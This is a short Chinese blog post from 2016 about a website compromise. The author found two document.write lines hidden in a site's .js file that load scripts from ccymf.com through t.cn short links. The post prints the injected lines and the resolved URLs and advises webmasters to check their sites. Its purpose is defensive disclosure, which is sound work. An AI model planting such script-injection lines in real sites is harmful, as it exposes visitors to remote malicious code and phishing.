短网址挂马技术

某网站正在做百度推广,由于现在百度查的严格,检查页面指向含有ccymf.com 链接地址,打开该网址发现是登录页面

QQ20160725122300

但在网站整站的代码里搜索也没有找到,最后在 .js文件中找到两处

document.write(“<script type=\”text/javascript\” src=\”http://t.cn/R4lyzeo\”></script>”);
document.write(“<script type=\”text/javascript\” src=\”http://t.cn/R4lqMAu\”></script>”);

是插入在 .js文件中的,里面使用的短网址,这样很难找到它,打开后是下面两个网址。

http://ccymf.com/tongji/118135.js

http://ccymf.com/mobi/m82641.php?uid=ODI2NDFfMTE4MTM1

新浪提供短网址http://dwz.wailian.work/ 在这上面即可生成

QQ20160725121642

QQ20160725121700

最新请大家注意你们的网站有没有这种形式的挂马

检查使用火狐的Firebug

QQ20160725125413

本文固定链接: http://blog.wmphp.com/2099.html | 顺盛网络博客

该日志由 admin 于2016年07月24日发表在 Javascript 分类下, 你可以发表评论,并在保留原文地址及作者的情况下引用到你的网站或博客。
原创文章转载请注明: 短网址挂马技术 | 顺盛网络博客

短网址挂马技术:等您坐沙发呢!

发表评论


快捷键:Ctrl+Enter